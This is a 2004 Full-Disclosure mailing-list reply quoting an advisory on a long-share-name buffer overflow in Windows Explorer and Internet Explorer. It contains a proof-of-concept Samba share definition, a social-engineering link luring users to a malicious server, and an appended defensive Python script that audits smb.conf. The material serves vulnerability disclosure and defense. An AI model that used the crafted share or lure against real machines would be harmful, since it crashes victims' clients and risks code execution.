[Full-Disclosure] Re: Microsoft's Explorer and Internet Explorer long share name buffer overflow.

From: Daniel Regalado Arias (dan57170_at_yahoo.com)
Date: 04/26/04

    To: Rodrigo Gutierrez <rodrigo@intellicomp.cl>, full-disclosure@lists.netsys.com, bugtraq@securityfocus.com, submissions@packetstormsecurity.org, info@securiteam.com
    Date: Mon, 26 Apr 2004 15:55:55 -0500 (CDT)
    
    

    Well, I have tested it in W2k with SP3 and Explorer
    didn't crash!!!!!!!

    Well, I can't get into the share because a message
    appears saying "share name not found"!!!!

    But Explorer is OK.

     --- Rodrigo Gutierrez <rodrigo@intellicomp.cl> wrote:
    > Sunday afternoon is a bit boring, and weather sucks
    > down here in Santiago, Chile so here we go...
    > The vuln is attached in TXT format, I would be
    > grateful if someone could verify if it affects
    > Windows 2003 as well.
    >
    > Rodrigo.-
    > > Microsoft Explorer and Internet Explorer Long Share
    > > Name Buffer Overflow.
    >
    >
    >
    > Author: Rodrigo Gutierrez <rodrigo@intellicomp.cl>
    >
    > Affected: MS Internet Explorer, MS Explorer (explorer.exe)
    > Windows XP (All), Windows 2000 (All)
    >
    > Not Tested: Windows 2003, Windows Me, Windows 98, Windows 95
    >
    > Vendor Status: I notified the vendor in the beginning of 2002;
    > this vulnerability was supposed to be fixed in XP Service Pack 1
    > according to the vendor's Knowledge Base article 322857.
    >
    > Vendor url:
    > http://support.microsoft.com/default.aspx?scid=kb;en-us;322857
    >
    >
    >
    > Background.
    >
    > MS Explorer (explorer.exe) and MS Internet Explorer (IEXPLORE.EXE)
    > are core pieces of Microsoft Windows Operating Systems.
    >
    >
    >
    > Description
    >
    > Windows fails to handle long share names when accessing remote
    > file servers such as Samba, allowing a malicious server to crash
    > the client's Explorer and eventually execute arbitrary code on the
    > machine as the current user (usually with Administrator rights on
    > Windows machines).
    >
    >
    >
    > Analysis
    >
    > In order to exploit this, an attacker must be able to get a user
    > to connect to a malicious server which contains a share name equal
    > to or longer than 300 characters. Windows won't allow you to create
    > such a share, but of course Samba includes the feature ;). After
    > your Samba box is up and running, create a share in your smb.conf:
    >
    >
    >
    > #------------ CUT HERE -------------
    >
    >
    > [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
    > comment = Area 51
    > path = /tmp/testfolder
    > public = yes
    > writable = yes
    > printable = no
    > browseable = yes
    > write list = @trymywingchung
    >
    > #------------ CUT HERE -------------
    >
    >
    > After your server is up, just go to your Windows test box and go
    > to Start menu > Run > \\your.malicious.server.ip, plufff, Explorer
    > will crash :).
    >
    > Social Engineering:
    >
    > <a href="\\my.malicious.server.ip">Enter My 0day sploit archive</a>
    >
    >
    >
    > Workaround.
    >
    > From your network card settings, disable the Client for Microsoft
    > Networks until a real fix for this vulnerability is available.
    >


    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
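A defensive check that follows from the advisory: the crash needs a share name Windows itself would never create, so a server-side lint of smb.conf catches it before any client browses the server. This is an added example of mine, not code from either message; the 300-character crash threshold is the advisory's, while the 80-character Windows share-name limit used as the policy threshold is my assumption, and the sample smb.conf is constructed.

```python
import re

# Length at or above which the advisory reports the Windows client crashing.
CRASH_LENGTH = 300
# Longest share name Windows itself will create (80 chars); used here as the
# policy limit. This limit is my assumption, not something the advisory states.
WINDOWS_MAX_SHARE_NAME = 80

# Constructed sample smb.conf: one sane share plus one share named like the
# advisory's, with a 320-character name.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
[public]
   path = /srv/public
; a comment, not a section
[%s]
   comment = Area 51
   path = /tmp/testfolder
""" % ("A" * 320)

SECTION_RE = re.compile(r"^\s*\[(?P<name>[^\]]*)\]\s*$")
# [global] is not a share; [homes] and [printers] are template sections.
SPECIAL_SECTIONS = {"global", "homes", "printers"}

def share_names(conf_text):
    """Return share names declared in smb.conf-style text, skipping comments."""
    names = []
    for line in conf_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped[0] in "#;":
            continue
        m = SECTION_RE.match(line)
        if m and m.group("name").lower() not in SPECIAL_SECTIONS:
            names.append(m.group("name"))
    return names

def overlong_shares(conf_text, limit=WINDOWS_MAX_SHARE_NAME):
    """Return (name, length) for every share name longer than `limit`."""
    return [(n, len(n)) for n in share_names(conf_text) if len(n) > limit]

def audit(conf_text):
    """One finding per overlong share; names at the crash length are flagged."""
    findings = []
    for name, length in overlong_shares(conf_text):
        tag = "CRASH-LENGTH" if length >= CRASH_LENGTH else "over-limit"
        findings.append("%s: %d-char share name %s..." % (tag, length, name[:12]))
    return findings
```

Run `audit()` over a server's smb.conf in a config-review step; a share name at or above the crash length is a hard failure, anything over the Windows limit is worth a look since Windows clients can never have been tested against it.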

